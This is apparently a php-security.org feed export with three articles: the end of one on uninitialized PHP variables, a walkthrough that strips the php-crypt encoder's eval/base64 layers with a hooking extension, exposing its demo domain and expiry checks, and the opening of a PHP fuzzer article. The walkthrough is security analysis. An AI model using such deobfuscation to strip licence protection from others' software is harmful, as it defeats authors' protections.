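        $groups[$id]++;       // ... then always increment
    }
    return $groups;
}

print_r(countGroups(array(
    array("id_group" => 1),
    array("id_group" => 2),
    array("id_group" => 1),
)));
// Group 1 is counted twice, group 2 once.
```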

E_NOTICE is issued at runtime

The third problem with notices is security-related. If some use of an uninitialized variable is not spotted during development, an attacker can exploit it. It is nice to be informed about the use of an uninitialized variable in the error log, but if it is used for an attack, then it is too late. It is possible to make notices fatal with set_error_handler(), but this is not worth it for most applications.
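For applications where it is worth it, making notices fatal can be sketched as follows. Converting them to ErrorException is one common pattern rather than the only option. Note that since PHP 8.0 the use of an undefined variable raises E_WARNING instead of E_NOTICE, which is why the handler below covers both levels. The helper readUninitialized() is hypothetical and exists only to show the effect.

```php
<?php
error_reporting(E_ALL);

// Turn notices and warnings into exceptions so they cannot be overlooked.
set_error_handler(function ($severity, $message, $file, $line) {
    throw new ErrorException($message, 0, $severity, $file, $line);
}, E_NOTICE | E_WARNING);

// Hypothetical helper: reports whether reading an unset variable was stopped.
function readUninitialized() {
    try {
        $copy = $neverAssigned; // deliberately uninitialized
        return false;
    } catch (ErrorException $e) {
        return true;
    }
}

var_dump(readUninitialized()); // bool(true)
```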

Better spotting of uninitialized variables

I would not recommend disabling notices. However, they do not solve all problems and they require writing more verbose code, as you have seen. Luckily, there is a better way to spot uninitialized variables that solves all three problems of notices. It is called php-initialized. It is a tool that analyzes PHP source code to spot uninitialized variables. It does not run the code and has some limitations, but it can be used to check the code routinely, for example after refactoring or before a commit.

The biggest limitation is that only the current block is considered as the variable scope. Thus, the following code would complain about uninitialized $auth:

<?php
if (authUser($_POST["login"], $_POST["password"])) {
    $auth = true;
} else {
    $auth = false;
}
if ($auth) {
    echo "Secret\n";
}
// prints: Uninitialized variable $auth on line 7
?>

This is partly a policy decision, explained earlier in this article: it is less error-prone to initialize variables unconditionally. Apart from this limitation, the supported features cover nearly all parts of PHP.

Note: The author of this article is the main developer of php-initialized.

Do not use $_REQUEST

Variable spoofing does not involve only global variables. The $_REQUEST variable can be filled from a source other than the one the programmer assumes. This is thoroughly explained by Stefan Esser. I would only add that, since the contents of $_REQUEST can be affected by request_order as of PHP 5.3.0, an application cannot rely on the contents of $_REQUEST and would not run on some configurations.

Summary

A good PHP application should always initialize all variables before use. It is a good idea to turn off register_globals, but a good application should not rely on it. PHP offers the E_NOTICE error level, which can spot some uninitialized variables, but it is not 100% reliable. The php-initialized tool addresses its deficiencies.

]]>
http://php-security.org/2010/05/17/mops-submission-06-variable-initialization-in-php/feed/ 3
Article: Decoding a User Space Encoded PHP Script http://php-security.org/2010/05/13/article-decoding-a-user-space-encoded-php-script/ http://php-security.org/2010/05/13/article-decoding-a-user-space-encoded-php-script/#comments Thu, 13 May 2010 12:01:53 +0000 admin http://php-security.org/?p=246 Today we present you a short article about how to decode a PHP file encoded with the php-crypt.com PHP encoder. This article was written today by Stefan Esser after having seen an advertisement for php-crypt in the Xing PHP Development Forum.

Decoding a User Space Encoded PHP Script

Stefan Esser, 2010-05-13

Introduction

Every once in a while a new PHP encryption tool or service pops up and offers PHP “encryption”. Therefore the idea behind php-crypt, which was announced today in the PHP Development forum of Xing, is nothing new. In fact, there are two types of PHP encryption systems: source code obfuscators/encryptors/encoders and bytecode obfuscators/encryptors/encoders. The first type is usually implemented in PHP user space, and the second type requires a PHP extension written in C/C++ that hooks into the Zend Engine and encrypts the executed Zend Engine bytecode.

PHP-Crypt belongs to the first type of obfuscators/encryptors/encoders and is implemented in PHP user space only. Because I have yet to see a user space PHP encoding tool that is hard to break, I took a quick look at it and present my results here in order to show how useless this type of encrypter usually is.

The encrypted Code

In order to play around with the crypter I wrote a very simple Hello World script in PHP and let it be encoded by the demo version of the php-crypt online encoder.

<?php
echo 'Hello World';
?>

The resulting encoded PHP script looks like this.

<?php
 /* Demo by www.php-crypt.com - Simple Script */
$keystroke1 = base64_decode("d2RyMTU5c3E0YXllejd4Y2duZl90djhubHVrNmpoYmlvMzJtcA==");
eval(gzinflate(base64_decode('hY69DsIgFIVf5QwMENGUuWH0QZTeKrFekgsMxvTdLWlqTBfX8/uNlUOJiSGpEIc0kFa5SOSbVZdnqlwM3lAPesEj1+vifQPoLJzpEUe9KBPx5hjvXasJlSqMcBedZNBtxeCAbbjHDJoy/U/i1PjOK9+ewlns7o/O2N+X+QM=')));
$O0O0O0O0O0O0=$keystroke1[2].$keystroke1[32].$keystroke1[20].$keystroke1[11].$keystroke1[23].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
$keystroke2 = $O0O0O0O0O0O0("<84>q^?>BF<80>~An<86>r<87>D<85>pt{sl<81><83>E{y<82>xCwuov|@?z}", -13);
$OO000OO000OO=$keystroke2[16].$keystroke2[12].$keystroke2[31].$keystroke2[23].$keystroke2[18].$keystroke2[24].$keystroke2[9].$keystroke2[20].$keystroke2[11];
$O0000000000O=$keystroke1[30].$keystroke1[9].$keystroke1[6].$keystroke1[11].$keystroke1[27].$keystroke1[8].$keystroke1[19].$keystroke1[1].$keystroke1[11].$keystroke1[15].$keystroke1[32].$keystroke1[1].$keystroke1[11];
eval($OO000OO000OO(base64_decode('LdA3sq
NIAADQy2zVzC8CbGNqIxBGeCdssoVHQAsJaBCcfi
bY5B3gNXsx/f7HdQmC+J/fZbE2LPNf3VRz3fz+Zd
WyQcAtE0W5mzD4aXDstO3EZ5fZ6o1+uM21ozLcG4
oviaCrvdlt4VDbtWhbbhEaS9cHHMupqeDvDT6rqr
daT+HkHxDNJwXmzuOunr217Kp8Lc6Gz6niMUJWgy
aJz2jBt08FFvHcpWZPJ2yX7Fkpp8dwKG4bHJbKI8
uLHi8Pq7zw4KTKlbrcVKdZUIpkRRI+C2raVY29RH
cRvd+0KAJTUYZtNdp0PxuWK4XqIIP07csc7LDjyO
jyHWZUXGkAOc/l5SQwb0FYU4BFAohVOddtT6t13l
Pq0Svrg8TKOgpZFial/NFaFNS9eJUzKWkH+c30MA
5zM+tYk0aOSHEQA1OBi6x2u9y/P+I5GcMYCOsY+1
CUs4+SeZ70eFlOa94otqFgPpBNnqpTRJiZYkr5FC
Tf4GCWd/UdqQ5N0i0HG9+lpL7b4WAakYYFVsookf
GOMJlQVMWfafs5ObbUp+7GE7o0f8u2vYQIkt2QoI
mpqY6NKTTK7hWMnUEhXp6UtY6VSmNVlvoGe5t8QT
8k2zL7MV/7IeH29eab38y7ICMFxMYfrzf92EcFO2
ciagFgZNhUbIH+cgX+fis4EmE20LuXC7TzMeDxag
YZO4Dm41XX3ne693l79ySwtISgE4l/0kI45w39sk
lPQGAJVBKPuVViivYZI+pxpjtFsIJ+HS9S+rTAuk
2pwd1CwVFxxwyeQ8ub5yV1y0VaFCemmxHDSHehEC
fgUpkrUQUqdW9DEbHJRE2WHBnjV6UZTABkfi/qGc
CJ6eQVQjru7w9Pkpcj0U2E1Zpee54WmE1U0M5M8h
TrK/MjN448JrDrrVAtsbvj2GbfHbfvxASzEk/1Hh
FvykLz1J1RiUu+57ywZH3mW+z6buQU8krlkMnluX
+2F+Y92m2s49U1xLLbWCILbHvYNye/D/k+ymdFOa
kaMgzNNbLsZod01KubNKEEUXK7RiUJUgXxV+HU33
DzpZLBfTuPM480nv50NjpMCeiwmxtvHFoqAO7wid
uGmqmaI3fNtiAfRnBlXdsZXKbtXZLEcPwCQutdPN
7gv35+fv79Aw=='
)));
?>

The code uses base64_decode(), gzinflate() and eval(), a lot of base64 encoded strings, some variable function calls and some non printable characters that will cause problems for anyone loading and saving the file in an editor. In order to analyse this encoded script I will use my evalhook PHP extension, which is presented in the next section.
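The variable function names in the listing can already be recovered by hand, without evaluating anything, because $keystroke1 is only a base64 encoded lookup string. The following sketch uses the exact string and offsets from the encoded script; only the helper pickChars() is a hypothetical name introduced here.

```php
<?php
// The lookup string from the encoded script.
$keystroke1 = base64_decode("d2RyMTU5c3E0YXllejd4Y2duZl90djhubHVrNmpoYmlvMzJtcA==");

// Hypothetical helper: join the characters found at the given offsets.
function pickChars($alphabet, array $offsets) {
    $name = '';
    foreach ($offsets as $offset) {
        $name .= $alphabet[$offset];
    }
    return $name;
}

echo $keystroke1, "\n"; // wdr159sq4ayez7xcgnf_tv8nluk6jhbio32mp

// Offsets used for $O0O0O0O0O0O0 in the encoded script.
echo pickChars($keystroke1, array(2, 32, 20, 11, 23, 15, 32, 1, 11)), "\n"; // rotencode

// Offsets used for $O0000000000O in the encoded script.
echo pickChars($keystroke1, array(30, 9, 6, 11, 27, 8, 19, 1, 11, 15, 32, 1, 11)), "\n"; // base64_decode
```

So the obfuscated variables merely hold the names rotencode and base64_decode, which are then called as variable functions.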

evalhook PHP extension

Whenever encoders like php-crypt have to be analysed, the task is usually the same. You take the script, replace all calls to eval() with die() and check what it tries to eval(). When it looks safe, you replace the eval() with the evaluated code and repeat. This is tedious and time-consuming work, especially when there are multiple layers of eval(). Therefore I wrote a short PHP extension called evalhook that helps with this task. The core functionality of this extension is very simple.
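For simple encoders the manual procedure can also be scripted in user space: instead of evaluating a layer, decode it and look at the result. The sketch below builds its own toy payload rather than using php-crypt's real output, and it assumes that every layer has exactly the form eval(gzinflate(base64_decode('...'))); and that the zlib extension is available. The names wrapLayer() and peelLayers() are hypothetical.

```php
<?php
// Wrap code in one eval(gzinflate(base64_decode())) layer (toy encoder).
function wrapLayer($code) {
    return "eval(gzinflate(base64_decode('" . base64_encode(gzdeflate($code)) . "')));";
}

// Repeatedly decode the outermost layer without ever calling eval().
function peelLayers($code, $maxLayers = 50) {
    $pattern = '/^\s*eval\(gzinflate\(base64_decode\(\'([A-Za-z0-9+\/=\s]+)\'\)\)\);\s*$/';
    for ($i = 0; $i < $maxLayers && preg_match($pattern, $code, $m); $i++) {
        $code = gzinflate(base64_decode($m[1]));
    }
    return $code;
}

$payload = "echo 'Hello World';";
for ($i = 0; $i < 3; $i++) {
    $payload = wrapLayer($payload);
}

echo peelLayers($payload), "\n"; // echo 'Hello World';
```

This breaks down as soon as the encoder varies the wrapper, for instance by hiding gzinflate behind a variable function, which is one reason why hooking the compile step itself is more convenient.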

static zend_op_array *(*orig_compile_string)(zval *source_string, char *filename TSRMLS_DC);
static zend_bool evalhook_hooked = 0;

static zend_op_array *evalhook_compile_string(zval *source_string, char *filename TSRMLS_DC)
{
    int c, len, yes;
    char *copy;
   
    /* Ignore non string eval() */
    if (Z_TYPE_P(source_string) != IS_STRING) {
        return orig_compile_string(source_string, filename TSRMLS_CC);
    }
   
    len  = Z_STRLEN_P(source_string);
    copy = estrndup(Z_STRVAL_P(source_string), len);
    if (len > strlen(copy)) {
        /* Replace embedded NUL bytes so that printf() shows the whole string */
        for (c=0; c<len; c++) if (copy[c] == 0) copy[c] = '?';
    }
   
    printf("Script tries to evaluate the following string.\n");
    printf("----\n");
    printf("%s\n", copy);
    printf("----\nDo you want to allow execution? [y/N]\n");
    efree(copy); /* the printable copy is no longer needed */
   
    yes = 0;
    while (1) {
        c = getchar();
        if (c == '\n') break;
        if (c == 'y' || c == 'Y') {
            yes = 1;
        }
    }

    if (yes) {
        return orig_compile_string(source_string, filename TSRMLS_CC);
    }
   
    zend_error(E_ERROR, "evalhook: script abort due to disallowed eval()");
}


PHP_MINIT_FUNCTION(evalhook)
{
    if (evalhook_hooked == 0) {
        evalhook_hooked = 1;
        orig_compile_string = zend_compile_string;
        zend_compile_string = evalhook_compile_string;
    }
    return SUCCESS;
}

PHP_MSHUTDOWN_FUNCTION(evalhook)
{
    if (evalhook_hooked == 1) {
        evalhook_hooked = 0;
        zend_compile_string = orig_compile_string;
    }
    return SUCCESS;
}

This extension simply replaces the zend_compile_string function pointer inside PHP, which is called whenever a string is evaluated. This covers not only eval() but all other kinds of dynamic PHP code evaluation, such as the one inside create_function(). You can download your copy of evalhook here.

Deprotection

In order to demonstrate how powerful evalhook is when it comes to removing encoders like php-crypt, we will now try to deprotect the above hello world script. We do this by simply executing the encoded script with the evalhook extension loaded.

$ php -d extension=evalhook.so encoded_script.php
Script tries to evaluate the following string.
----
function rotencode($string,$amount) { $key = substr($string, 0, 1); if(strlen($string)==1) { return chr(ord($key) + $amount); } else { return chr(ord($key) + $amount) . rotEncode(substr($string, 1, strlen($string)-1), $amount); }}
----
Do you want to allow execution? [y/N]

We can see that the first eval() just defines a new function that provides ROT encoding. There is nothing dangerous about it, so we let it execute and wait for the next eval().
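Knowing what rotencode() does, the second lookup string can be decoded by hand as well. The sketch below uses an iterative equivalent of the recursive function and applies it with the shift of -13 from the encoded script. It assumes that the <84>, <80> and ^? sequences in the listing are a pager's rendering of the raw bytes 0x84, 0x80 and 0x7f, and so on; rotShift() and pickChars() are hypothetical names.

```php
<?php
// Iterative equivalent of the recovered rotencode() for non-empty strings.
function rotShift($string, $amount) {
    $out = '';
    for ($i = 0, $n = strlen($string); $i < $n; $i++) {
        $out .= chr(ord($string[$i]) + $amount);
    }
    return $out;
}

// Hypothetical helper: join the characters found at the given offsets.
function pickChars($alphabet, array $offsets) {
    $name = '';
    foreach ($offsets as $offset) {
        $name .= $alphabet[$offset];
    }
    return $name;
}

// The argument of the rotencode() call, with raw bytes written as \x escapes.
$encoded = "\x84q\x7f>BF\x80~An\x86r\x87D\x85pt{sl\x81\x83E{y\x82xCwuov|@?z}";
$keystroke2 = rotShift($encoded, -13);

echo $keystroke2, "\n"; // wdr159sq4ayez7xcgnf_tv8nluk6jhbio32mp

// Offsets used for $OO000OO000OO in the encoded script.
echo pickChars($keystroke2, array(16, 12, 31, 23, 18, 24, 9, 20, 11)), "\n"; // gzinflate
```

Under that assumption $keystroke2 is the same lookup string as $keystroke1, and $OO000OO000OO holds the name gzinflate.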

Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('LdDJ0mtYAADgl+mqe/+yMMWQ6roLhJhjCodNF47pmAnB03cvevM9wFfsaff7r9eLIIj/+Z2la8He/oFFPsLi9y8Tmuoy25ogP7zh6Cf6sExL7Mmilc8+0DFReWVyUr/tqc5rAyvBevXl+vBMoEblTjwEOfRwLF8uLPUTnP+cPSw7BcOBgZKFlo9EaWsuB/o9FXgceMrUHAupp3AA5KEEjtsJfXvye67b9cw1RXpQD7mg+wwY3bpSY2VcG5uNirnNWmZf5Sd256u95VFDZIMPGdI8PEdkPbdw1+bdUS66mWbDqGfuRdhAzbo1BGw1xYISVSZKYg6K3uNA27m+5la/A6GCzOf7rAylJjkR9skVQmADYqEYPPBTnLNfKC26e2mZj1eZXFlU0KYEKBZlRWxRw4rpcxk2gulBCZ5t8gX1IvMSjKJUG+RLX4EUJpU+D0EFEQo3MilNMBhXOt80IBoxbffz9Um1gjWul4d2g6V2ukDOzRkgJ2u8DlEsdVEcG6F62xRvfWx5hjWtroQV8dQS0OhdtQKxYPzm4BR0t8wnp3TvkE+yo0Uf554Dmec6auec6zRQvCa71u+M5IgnO5GyTj/VsKRY6j5eqPczvhgIPqpPHWRLGW03WB8i39SoZe3nM1P9u5rRF1/V7sB4afiVu2TyXv2069Izwn1Bqf5LClXJ7CS9NF/NKRijf8KyzBgrz1L27AXtJVmUIOm9VW5zF4zWF92XOCjaU6Wl2lLDUJkxF34+951ZHado5ml4gDsmm3VhHTPBDrwWIKu+dGIdPPGRKeUa3No1826QEoTZJwZV0+zpE2f0vOkkfYxv/MH0lmYb/XIhu0p2LuolgyUb/BQPNn+WsiZtVOQOUNaDs2Zm4ZDohifz+PTftkdVsOJAbgt60YRMMjvtNZHjZvkDyc2NXFS4437eDDOYwBwdsOWeSBmuWCzkEWRXEu8zaNdxStQBb4/QMZVYP1JiQlyeImX0mN6tOVt7urc55Hmi/MJFYFGNDgetruQmUms6OMNjO4fhO11+//z59fPz8/e/')));
----
Do you want to allow execution? [y/N]

We can see that the code tries to eval() another piece of code that calls eval() again. In fact, there is also a call to a variable function through $OO000OO000OO. This is harmless in this case because the variable just contains the string gzinflate. However, if the code to decrypt is actually malware, you should not allow execution here and should first check the content of this variable. Therefore, do not use evalhook on malware as it is. For malware you need to hook all “dangerous” functions first.

But in this case we do not deal with malware and therefore we will just allow execution, which will reveal another eval() layer. And therefore we just continue until something changes.

Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('LdLHrqNIAEDRnxmp3xMLMBm1ekEymTJ+BFObEZhUNphchK+fXszmfsDRLXHWfv0DAEVR/+crz+aSZ/8tymdflF+/XKjZr3ExZFkh7cXJ9aA8/XRFpixr1JadnX1xFTPQlAmky8vcJNhq7ieax2DEe3mbXKlss2ogKzu6boFLuqIbNzftYQqzk4cWi0bnSd51LxRPB6RQeQsiUl2Qj4LLi5HycRW+n2qJMnT6gpYAFWgLjZY7dBRDxjuysOqkJ9XAgd5twGgKFh17BdmZzVdXNX0r25/TSa/7NOjael9fMLDOfZzbWe3LCX26jbeYM2ns+JqfViALRdCdykZwXhrE8CdWWaInEzJsXCVZgJqnTgdjjVu1ZfLXnKzaq4IXBKY3NmqztaIe6KzORjvK62v3ejP4Pnd7EI8JdjYClWYYKVH4uFRsDucb+ikJFVg0GIZXiJlgsXBe5Six7Fj9MLG7FlUV8ZbxkjtP9cXE87l2v7PzyKjYsZvImv5CPBy6p1EJ3GHVf2629ozjmSb8en08WhyJXbrfWu4dhxB8ihjk6NGGbHS9Hb3z8ghQn5RaVwElZpROmpvJCGW/SAFgOfZVHCLlCJfLOiyAKoSydffb5Mcba6ymAIOCM2ACJmMfuqlToMwj9rYTekyH3ChMHVVFq+Qdtt9v5sPPeiqpnDX9+ELheMxq06n8ITjMhzJ0snRBDbFfsT4ksbR4d2AAqS0nHIINptYb3quJ13xoU/D5mMINKmrzjNgZv7WmCK61i/yBx6cGfEICu2WQndEJTyh5qAxC3i81cYySUNR2gdg7XcNAJeiV5ZqPkzp1ouMSn17qiEeg/PQtU55nLXLoPXucRB2KQBer1xTbzZYvqXksopZHn/kxVPLFYJxa0pj7cajFoR5mQh7NIGQ4qV880fwdrA6jhjxPjsQCQZCkLP/58+v7+/v3fw==')));
----
Do you want to allow execution? [y/N]
y
Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('LZDJjqtGAAB/JtKbEQezNYuiHAAD0wazmJ1LBHQDBrOYtjHw9ZlDLnUsqQqvxePrL9elafp/fJUFwQL/L8LVhPDXH7sKbTI4iqKc/REMT8zKOYZBk78iCLObq7L68UBnLB6org90GE21itQidiwTGl5yEiVZ3MyaTfm9c0hZp2xJO3DBv8KJuOazasFLCHNIaxcrz2uxrpEDuRujZQIzxqslsCoerinmw6I3zWhJVFbzIQA7dQmzBw+5MYQVZSVC4+o/W/ThLBWtOCbYKmZVD5uDtrNub/flFBvtiOrkvGgHlIUoOE4E4UxibgFmjk3vRsmxQVqWvKw+ieHTUBUTX1f4bZsPiSe+COI2OppjTv3QtIvbfbiWIJVCn3VLudffU6IGjAmMCN8WMN5lxR4sq3CvKJhUIrl5yXK2o2ieOLpuESPJDcVVs2+NguXXlvU8mYxPl5kVTZOndVObiXlT4UFPyoKjM+Ogz0CgfQ08a0E/HwH37eot9QO454jdy80K711uptO0d7elLxPrNVw4GuH7ZQd5GZWOrGxpmrmBZA6i4Px+EV2T5q7rm0fUu9MyJNowHXNao0WfKuYnN7dKM3uJ2YAn+5v6TAZKaYtih+xFvEpWV9tMROGO9lervTOwZYIkZRfr6DNZJ0ZcXrTwZBChcU4svkDhdQFgLiNp6vzDON+9OxIG/mGm7cZ9MieQT6NeD8qUWT8Dx7+xmEDvOC+2u45hnKYKgWEvevzMYK8yQBSol3ezzg85iksM590yB72duMhdwPJA1YHyt8DbUnsXpfA1G3Kg9D3RyyCdyCyHW/yhp7avWgj6+hCoegTUh/zz5/v7++//AA==')));
----
Do you want to allow execution? [y/N]
y
Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('LcTLsmNAAADQn5mqe29ZeISgZtUIIYROB2EzldDe7zdffzdzFgcv7+r7j21TFPW/7897xGf2X4yjNsbfX2b0NIreAAAosOGqch5t6TZI0CJKZZf7ffdNI3R1CY61nVvK62BemMXe4TakGGUrWB2CQI55y+JTYl4I3nTIc+KW6gOEHxUw3KBdveVseKapBETgz0LYjyhyr/VFhndfWDrCzI96USz/sdeY81RSe1zxEjn8NL5Xbb49BqsFQ0IB7WQEA4xxpz84sQ75VhUzgzpXQTGLaRimMb5X8TQ2Ob9kEuoWBS1G5FUeRr5ni9ALmKKaOMdSoBs8OZb23LNACP7nOOaVd8OT7vCLRgAe9txYk4soFwjYGc00sqKRBgo1u+Tz0oAreUD1NdwmsILMSPKrdHw6ekhvPrfl5ODU2ybxKTijZGXooyjRrkbWKtmJ30deiJy5ZbUbN9AxXXYOS8Gm76Ngz07OG03Mvu4d+ujCYd7LIXnZ0C07Q+apq3phAgpPWGg5q2mMbqWm+AhaayI2J7M8KjfL1U+ej0QvKhi1Ih1SWX2rKzkY9EsFVbJCT/Fs6gN/2eJI6tJ55pbU8ojQzFDiPid6m4lGXhx3wYNS9/nEfmAoYKHm34ue7WIPzDrLOvnTVXXAsITk7P4p1ePcF5USBJugvpl9UVbeIpyKGmEho3UOr5rldczdZu64L8hi78TtpF9SAkksEbSXosp9TxVw0ohkchI5kfz6+fn5+ws=')));
----
Do you want to allow execution? [y/N]
y
Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('LcTJjqJAAADQn5lkusOBKrBQM+kDyCqyyWLJZUIBQsmOiMDXz2Xe4eVzUn/9chwAwP++SPLKhd3fLE+7LP/6fUkFRAZbFA25rGHVv6JVLLDY+YWu8ZqsScUHmECQNW8vp+LizmvDMWRyme5VF/GRHevcP7tsawGuKRrMoArf0AG3JYrQdepIR59mZ7oF9hJ06lYju9gZZgdeNldtsni7vhBSpvDSvJcVlVeSWVO9QVY2jlt5PMDQUYT541VU68+8Wbzzuw7UZ3IP7vG+A7Qq5sm/v9CjSAOh12nCDG/JSZGOk7ikJQw/zQFXrKtAwAhJfiHBzbp1rgKW5xi/rPmxxB7gA6Sfw21zjkSyFcMwBOfWqcVZSPuo4GK5r1d1kpP40QnqqcYyh3PaSt2ywypSbI8zLNkrfXOQUkpJC70HFE2Y0ete8o5MnnJpw0tdzYoMt+xPhMV0iLkwWfTRfIjlQco91Z0hmKmlCYrIElQF/lST96LIr7ExdcBpguu5vgMV+ZLhSfUTt1xu+nCvPUverDmqit4bQZ8e8m7avIhy9qALmhhpCbplmY24+BPyW3gIdiW9DkAYx8Fa2yvDw7M+Pl0sQjCSwuZHGMVp2NO2Neqj/jyp9x3IEg+SB4+YoEjliWVF8efn9/f3959/')));
----
Do you want to allow execution? [y/N]
y
Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('Lc65bqNAAIDhl1kpsVyAgXAoSgHG3GDGBgw0K06DGQ7DcAxPvym2+btP+oslgZ9/rleSJP/nM02mgmX+5kXW58Xnh5V5RtoboijKoKPgXQa5CoyIdLNdX/q3DKyGtM3NlLbbhc1Lmuxy5hRbdMtlz1/DI9zh981UOE6vwQkiGpJ3KgueYH0FjaYTYZ7o0ikgvtSYs5fgcT6pHia+quBOc5HXaZhih1Uwm8Xk/PE10+6aeLbTWMWoPE0xjrZsMvfxZQ03T5HJUzzO9bBNEIII6OWoFgJ6cpVg2ZDplyFtDaZfo6FClXD2XeinBox4XF5ENQ2IMDQhSKqBciibn1Qf1AK1diR7BQ9+ec2cm3Bol/A+2x7Cb/XiqZ2UaxHrKfAh8BeQFPv10viMG6EA/b5kTStlbuxEDsrmKH02G6PQPSO1EDLdXtFSaPhxWHqYlQMDzMvVkgpQr0pc8eotzQVi2NqH6GAVGa5WddN52ZwU3zU8T4hiRq06rrqMynR+31JHrjPXA10rbgN3r1VZcUpinnIl9HjCFY40daQ1bf35+TgcDt//AA==')));
----
Do you want to allow execution? [y/N]
y
Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('LcTJboJAAADQn2lSDQdGQJY0PczIvoqDQLk0MKxKBxRE6df30nd41ZL3m7cgAAD8tynyqRKF77IiQ1lt3l0S2cVgQwjVkHI/XdaIB1V/5GZ7MvVWC1GTy/5hVS37YTnHy26pw9KkvK7Urju3PwaTMNkLerFgKAZYxcsKzrjLpRTFD01ZruipxsllQYQIfrGe9tg7h9LMl4ovpbmJ4owYphth9CUPlUbJlY8yfEAGbV/XXKlQahp2N2M8sGUQi92wn06OQW8vju7Pa7tzByzuMTtyqGETGnBdHY6TFlW98EQaezOEkU4PYtVtD01ckmBcPZNYNtcuYbgkx4F3o4Bmll4nzh3BXJUZXfTy6DVJQuvOLBeQiwFZh8GRbd9/pxmWANyGtJPHhnsCvxNbySHyust24rHh+wIDtfbuqRbNDicPTQnmAxp7SiGDFNf/usdFXT8/P9+32+3HHw==')));
----
Do you want to allow execution? [y/N]
y
Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('LcTJboJAAADQn2miZg6CDFuaHhRHFhEQBga8NCyDIJuIKPj1vfQdHn3F9fLLthmG+W+ZxAMV4G9G0y6jy0USia7XBVuE9vkBwDVWjvBcc4NbyR5SMUQ7t3d9N7XaHBVZcGHLTSBY8oeEnck3TZSCBGnhxka9eBXHGJitSSo/dOV6io5sRKGnqx2n5Uyh1LoS65S/p2Bg/WnO2ifQpsETel4wBE/qG4pnsucIfhlAHSdcOpyMHcIJ2hvQQvWPo3LTOnZIFfWKrBAaD8+F6MaTxs74hLt/2OcjGA/K+STJJrzstAd00qoXi8pg2w0Ni6h7Kc8y1Z16Pg3lbS0DfMrXETtK28ogd0tCBplnnA+B9LNYrVbffw==')));
----
Do you want to allow execution? [y/N]
y
Script tries to evaluate the following string.
----
eval($OO000OO000OO(base64_decode('bY7RSoVAEEDfF+4/TCK4Ql3sRk9SEGT4EBRqRURcNnfEhdVZ1i2V6N9zWXoL5mmYc+bEHX2OEq7g7ua+LnLWkUXR9lxYK1Ye4SIGo3Hf0hClICaIe5pc+s1Uxydnt+HxsS6q56J6S8qmeTyWD3WTvJ+GuxTiP39TPW36Hw+ehGUKuCjHo1scCGgENX4JrSR4Ej5WmOd5b3pz1trVuFCQM89L4ZBHr4Pckq7hkJ1n2eXhYovCticIPlyMsij/9+TMf/Y1u8AkJWpN8EJWyyTfsV8=')));
----
Do you want to allow execution? [y/N]
y
Script tries to evaluate the following string.
----
$found = FALSE;
foreach(array("example.com") as $host){
if(strstr($_SERVER['HTTP_HOST'],$host)) $found = TRUE;
}
if(!$found) exit("Demo on invalid host by www.php-crypt.com");

if(date("Ymd") > 20100523){
echo "Demo expired by www.php-crypt.com";
exit;
}

echo 'Hello World';

----
Do you want to allow execution? [y/N]

As we can see there are a lot of eval() layers, but in the end there is pretty much the original code that was protected. In addition to the original code we also see the domain verification and time limit functionality. It should be obvious that at this point we can just copy the original code and just forget about all the previous layers of protection.

Conclusion

As I have demonstrated, php-crypt does not pose any serious challenge when it comes to removing it. And it never will, unless the author comes up with a protection that does not rely on eval(). A future MOPS article by one of my colleagues at SektionEins will show that this is possible.

]]>
http://php-security.org/2010/05/13/article-decoding-a-user-space-encoded-php-script/feed/ 6
MOPS Submission 05 – The Minerva PHP Fuzzer http://php-security.org/2010/05/11/mops-submission-05-the-minerva-php-fuzzer/ http://php-security.org/2010/05/11/mops-submission-05-the-minerva-php-fuzzer/#comments Tue, 11 May 2010 19:29:45 +0000 admin http://php-security.org/?p=224 Today it is time for the fifth external MOPS submission. It is the second submission by Mateusz Kocielski, an article about his PHP fuzzer called Minerva.

Minerva – 1.0

Mateusz Kocielski

Table of contents:

  1. Introduction
  2. Minerva
  3. Future work
  4. Appendix

-[ 1. Introduction

-[[ 1 a) Abstract

Minerva is a PHP fuzzer designed to uncover bugs in PHP internals. This document contains information about its construction, fuzzing approach, as well as the bugs discovered and future work.

-[[ 1 b) Background

Minerva is a fuzzer dedicated to the PHP language. Fuzz testing, in brief, is a software testing technique that feeds random or invalid data to a program and then checks whether the program failed or something unexpected happened. This technique was proposed 20 years ago by Prof. Barton Miller, who noticed that many UNIX utilities crash when random data is provided to them as input. Historical background on fuzzing can be found on Miller's website [miller]. Over the years fuzz testing has evolved: many techniques have been proposed and a lot of software has been released. It is now a valid tool for both developers and hackers to discover bugs in software. The important thing to understand is that fuzzing is not a substitute for testing, but it can be a notable complement to it.

Minerva is not the first fuzzing tool dedicated to PHP; some work has been done already. Victor Steiner [steiner] released a PHP fuzzer as part of a bigger project, the fusil fuzzing framework [fusil]. His approach was to pass random arguments to random functions; a similar line of reasoning was presented by Lilxam [lilxam]. Passing random arguments to random functions is ineffective because PHP cares about types. With these fuzzers, many function calls fail right at the beginning because of bad argument types or a wrong number of arguments. In 2007 Calcite released PFF (PHP Fuzzing Framework) [pff].

PFF is configured by a template file in which the user specifies the function name and a list of types (string, integer, or random, which means that either an integer or a string will be chosen). Based on that file, PFF generates random function calls for PHP. All of these fuzzers discovered bugs in the PHP interpreter. Minerva's approach is to generate valid PHP scripts with a set number of function calls. Validity here means passing “almost correct” arguments to the functions. The code has “proof of concept” status and should be regarded as material for future research and development.

-[ 2. Minerva

-[[ 2 a) Description

As mentioned before, Minerva is based on the observation that passing random arguments to PHP functions is highly inefficient because in most cases it ends with a type error. A better approach is to respect the types and generate scripts with "almost correct" arguments. Minerva has a pre-defined set of initial variables as well as a database of functions with their return types and argument types. The core algorithm is simple and can be described by the following pseudo-code:

1.  script <- ""
2.  X <- Initial set of variables with their types
3.  G <- Fresh variable generator
4.  F <- Function database
5.  for i in 1..n:
6.   f <- GET_RANDOM(F, X)
7.   v <- G()
8.   X <- X u <v, f result type>
9.   script <- script . v . " = " . f call with random arguments from X (but
     with proper types)
10. return script

The GET_RANDOM function from line 6 returns a random function from F whose arguments can be covered by variables from the set X. The initial set of variables is defined in the src/minerva.py:generate() function, but it can be extended by providing an init file with a suitable function (e.g. function foo() { return "AAAA"; }) and adding the foo function to the function database. The generated script is divided into the following sections:

